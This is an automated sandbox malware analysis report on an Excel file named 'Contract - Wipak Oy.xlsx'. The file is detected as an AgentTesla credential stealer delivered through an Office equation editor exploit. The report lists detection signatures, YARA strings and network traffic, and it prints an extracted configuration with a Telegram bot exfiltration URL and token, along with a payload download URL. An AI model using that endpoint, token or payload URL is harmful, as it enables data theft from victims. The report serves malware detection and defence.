Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Contract - Wipak Oy.xlsx

Overview

General Information

Sample Name:Contract - Wipak Oy.xlsx
Analysis ID:679189
MD5:d0cd467a481799f5dc06a498e24ff4ad
SHA1:da919b490b8192eab7c577b4a85337d09eb56a9e
SHA256:831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c
Tags:xlsx
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Shellcode detected
Yara detected Generic Downloader
Office equation editor drops PE file
Machine Learning detection for dropped file
Office equation editor establishes network connection
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2960 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2244 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe (PID: 2912 cmdline: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe MD5: 6D370555D43F89189867FD72222C6059)
      • powershell_ise.exe (PID: 304 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe MD5: B3CC5F3514BF58EE55153795CF183754)
        • dw20.exe (PID: 676 cmdline: dw20.exe -x -s 536 MD5: FBA78261A16C65FA44145613E3669E6E)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "-624834641", "Chat URL": "https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1d4:$s1: <legacyDrawing r:id="
  • 0x1fc:$s2: <oleObject progId="
  • 0x23d:$s3: autoLoad="true"

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
  • 0x51280:$a13: get_DnsResolver
  • 0x4f8c2:$a20: get_LastAccessed
  • 0x51cb5:$a27: set_InternalServerPort
  • 0x4f9c9:$a33: get_Clipboard
  • 0x4f9d7:$a34: get_Keyboard
  • 0x50e5e:$a35: get_ShiftKeyDown
  • 0x50e6f:$a36: get_AltKeyDown
  • 0x4f9e4:$a37: get_Password
  • 0x5057c:$a38: get_PasswordHash
  • 0x516a5:$a39: get_DefaultCredentials

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x30000:$a13: get_DnsResolver
      • 0x2e83e:$a20: get_LastAccessed
      • 0x3095d:$a27: set_InternalServerPort
      • 0x30ca9:$a30: set_GuidMasterKey
      • 0x2e945:$a33: get_Clipboard
      • 0x2e953:$a34: get_Keyboard
      • 0x2fc24:$a35: get_ShiftKeyDown
      • 0x2fc35:$a36: get_AltKeyDown
      • 0x2e960:$a37: get_Password
      • 0x2f3d4:$a38: get_PasswordHash
      • 0x303df:$a39: get_DefaultCredentials
      00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          Click to see the 8 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x37f81:$s10: logins
                • 0x379ee:$s11: credential
                • 0x33f65:$g1: get_Clipboard
                • 0x33f73:$g2: get_Keyboard
                • 0x33f80:$g3: get_Password
                • 0x35234:$g4: get_CtrlKeyDown
                • 0x35244:$g5: get_ShiftKeyDown
                • 0x35255:$g6: get_AltKeyDown
                5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
                • 0x35640:$a13: get_DnsResolver
                • 0x33e5e:$a20: get_LastAccessed
                • 0x35f9d:$a27: set_InternalServerPort
                • 0x362e9:$a30: set_GuidMasterKey
                • 0x33f65:$a33: get_Clipboard
                • 0x33f73:$a34: get_Keyboard
                • 0x35244:$a35: get_ShiftKeyDown
                • 0x35255:$a36: get_AltKeyDown
                • 0x33f80:$a37: get_Password
                • 0x349f4:$a38: get_PasswordHash
                • 0x35a1f:$a39: get_DefaultCredentials
                Click to see the 14 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2244, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Contract - Wipak Oy.xlsxVirustotal: Detection: 53%Perma Link
                Source: Contract - Wipak Oy.xlsxReversingLabs: Detection: 41%
                Antivirus / Scanner detection for submitted sample
                Source: Contract - Wipak Oy.xlsxAvira: detected
                Antivirus detection for URL or domain
                Source: http://109.206.241.81/htdocs/zTALg.exeAvira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URL
                Source: http://109.206.241.81/htdocs/zTALg.exeVirustotal: Detection: 19%Perma Link
                Machine Learning detection for sample
                Source: Contract - Wipak Oy.xlsxJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exeJoe Sandbox ML: detected
                Source: 6.0.powershell_ise.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 6.0.powershell_ise.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "-624834641", "Chat URL": "https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument"}

                Exploits

                barindex
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeJump to behavior
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 136.243.86.20 Port: 443Jump to behavior
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 136.243.86.20:443 -> 192.168.2.22:49171 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.22:49172 version: TLS 1.2
                Source: Binary string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\powershell_ise.pdbw source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powershell_ise.pdbD source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 9C:\Win.pdbSys source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: .pdbN source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: indows\symbols\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Administrator\AppData\Local\Temp\2\System.Activities.pdb source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996241614.000000000060A000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000000.992431011.0000000000FF2000.00000020.00000001.01000000.00000005.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.2.dr, qGTGx[1].exe.2.dr
                Source: Binary string: T3npC:\Windows\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000002.1027747753.000000000478D000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: indows\powershell_ise.pdbpdbise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Shellcode detected
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8B6F LoadLibraryW,URLDownloadToFileW,2_2_038A8B6F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8C60 LoadLibraryW,ExitProcess,2_2_038A8C60
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8BFC URLDownloadToFileW,2_2_038A8BFC
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8C70 ExitProcess,2_2_038A8C70
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8C90 ExitProcess,2_2_038A8C90
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8C2D ExitProcess,2_2_038A8C2D
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8C17 ExitProcess,2_2_038A8C17
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8B97 URLDownloadToFileW,2_2_038A8B97
                Source: global trafficDNS query: name: pkusukoharjo.com
                Source: global trafficDNS query: name: cdn.discordapp.com
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 136.243.86.20:443 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 162.159.129.233:443 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
